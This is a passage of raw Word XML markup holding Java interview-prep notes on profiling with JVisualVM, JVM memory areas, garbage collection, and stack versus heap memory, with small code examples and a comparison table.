    </w:tbl>
    <w:p w14:paraId="13B01EC3"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E371D">
          <v:rect id="_x0000_i1256" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698D14D"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA270D9"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otice your Java app is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slowing down</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CFE5FC"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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVisualVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to attach to the running JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6D461"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hows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE734A"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constantly growing → Possible </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory leak</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799C703"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ertain method taking 80% of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Optimize that logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31746B7F"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deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between two threads → Fix synchronization issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E014394" w14:textId="406EC69A"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tart JVM Profiling (Example with JVisualVM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A5B03" w14:textId="39DF3FB2"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your Java application with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00610270" w14:textId="149194D7" w:rsidR="00120579" w:rsidRPr="00CE4B95" w:rsidRDefault="00120579" w:rsidP="006A7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8184372"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java -jar myapp.jar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0ECFCD"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jvisualvm (comes with JDK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F46E785"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ach to the running process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCADB6"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View tabs for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C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B58CF" w14:textId="7772A3A3"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 dum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filing snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for deep analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AF59C" w14:textId="08C3DCFB" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058D378B"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p>
    <w:p w14:paraId="1C7B1434"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s performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64744425"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resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFD107"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memory leaks early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16270318" w14:textId="176D49AB" w:rsidR="00A8451E"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fix concurrency issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44026CEE" w14:textId="3A7699FD" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A845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90F4929">
          <v:rect id="_x0000_i1257" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18274FA9"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6" w:name="_Toc197867310"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java memory management?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="78EF5690" w14:textId="6243D5B7" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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memory management is how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allocates, manages, and reclaims memory. It helps ensure your application runs efficiently and doesn't crash due to memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8DCEF"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FBE65">
          <v:rect id="_x0000_i1258" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA071C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Memory Areas in JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A890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Runtime data area)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8D824"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allocate memory for objects and class instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078D929"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d by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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272FCBF1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAFB26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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (new objects, short-lived)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C92DB"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den</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747AA942"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vivor Spaces (S0 and S1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC30AE"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (long-lived objects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA445A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from Java 8+, stores class metadata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11B5B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ck Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55762758"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p w14:paraId="30D03555"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stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9AD9F7"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LIFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Last-In-First-Out) model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8BBA3"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is freed automatically when the method ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45332D10"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thod Area (Metaspace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57549847"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structure like runtime constant pool, field, method data, and bytecode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362B0FC"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p w14:paraId="5C2CA18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rogram Counter (PC) Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373E1DD9"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the address of the current JVM instruction being executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650BEB31"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PC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A9D15"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ative Method Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78DFC8" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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native (non-Java) methods written in C/C++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2DDB7D"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7D8DF">
          <v:rect id="_x0000_i1259" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A307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Garbage Collection (GC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153207D8"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reclaims memory from unreachable objects in Heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63AF4D"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Phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4901E6"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Identify which objects are still in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDAC81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weep/Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Reclaim memory of unused objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B1E2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xml:space="preserve"> – Rearrange memory to avoid fragmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000AB6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GC Algorithms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BCD4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 GC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B408221"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GC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CCE829"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S (Concurrent Mark Sweep) – deprecated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F31A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1 (Garbage First) – default in Java 9+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BD79F"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GC &amp; Shenandoah – for low-latency applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BE873"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7B4FB">
          <v:rect id="_x0000_i1260" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC136A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GC in Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E9653"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E9B6B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22AD1"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00; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63018C9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Object(); // Creating objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A4BB9"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B7E91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gc(); // Suggest GC to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15774034"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C suggested");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6BA9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92344A"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ECBC26"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6F672">
          <v:rect id="_x0000_i1261" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFAB94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for Memory Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA37AFD"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creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B228B4"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propriate data structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD077B5"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ify references if not needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578D06F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 cautious with static references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5850EBA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filing tools (like VisualVM, JConsole).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B131021" w14:textId="474933F4" w:rsidR="007016EA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007016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074AE22">
          <v:rect id="_x0000_i1262" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D643D" w14:textId="55F8F255" w:rsidR="004043D8" w:rsidRPr="00CE4B95" w:rsidRDefault="004043D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc197867311"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Stack </w:t>
      </w:r>
      <w:r w:rsidR="00101BB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Heap memory?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="5687C412" w14:textId="09E9451B" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="0059733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p w14:paraId="3179C18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memory is essential for writing efficient Java programs and debugging memory-related issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270138F9"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29021">
          <v:rect id="_x0000_i1263" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F36A6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tack Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39457889"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E0380"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method call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cal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bject references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not the actual objects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35491646"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llocated per thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (each thread has its own stack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE84DED"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order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02566A"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utomatically managed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (freed once the method call is complete).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9E7C3"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access compared to heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FD1A1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0DE3CD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exampleMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D1F50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stored in stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2DC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Java"; // reference in stack, object in string pool/heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF449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87A4A1"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020B4">
          <v:rect id="_x0000_i1264" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3A8C6"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Heap Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EB08A"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037543C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A73AD1"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cross all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B884688"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managed by the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1606B922"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than stack due to complex management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF90C25"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F53A3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ployee emp = new Employee(); // 'emp' reference is in stack, object is in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A72CD2"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733D47">
          <v:rect id="_x0000_i1265" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F2E5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183"/>
        <w:gridCol w:w="2713"/>
      </w:tblGrid>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="686A7DF7" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2252507F"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AE6E04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1637740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597334" w:rsidRPr="00CE4B95" w14:paraId="18BCA536" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="586F55A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234E6B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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0283E38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rrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="4A97C75C" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181AC31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55BA215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609EE3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97334" w:rsidRPr="00CE4B95" w14:paraId="56C144A4" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC7F1D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00964BC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pecific</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20E6F13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threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="54B31E48" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F73359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11DC84B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at compile time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53DCB25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t runtime)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="40C29AC7" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="769D861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42E540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automatically (stack frame)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505AA6E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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="5A8F9622" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B8A57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3AB1035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method-specific)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33DA58D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until GC removes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="517F889E"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02CD39">
          <v:rect id="_x0000_i1266" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8EF50"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Diagram (Simple)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF1A8B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tack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1D6A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4E02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B() |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47C1A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A() |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE330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ain()    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958BFA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BD4C4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s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523F4C4" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F71ED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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3C4DD"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C4280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Employee() object     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F806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String("Java") object |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E120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B55F1" w14:textId="4628C4BE"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18A2C2">
          <v:rect id="_x0000_i1267" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572E52E" w14:textId="77777777" w:rsidR="00E73DB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E73DB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc197867312"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain memory management below? Int and Integer?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="3C926694" w14:textId="1040FF72" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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eat question! Let's break down </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory management for int (primitive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ger (wrapper class)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
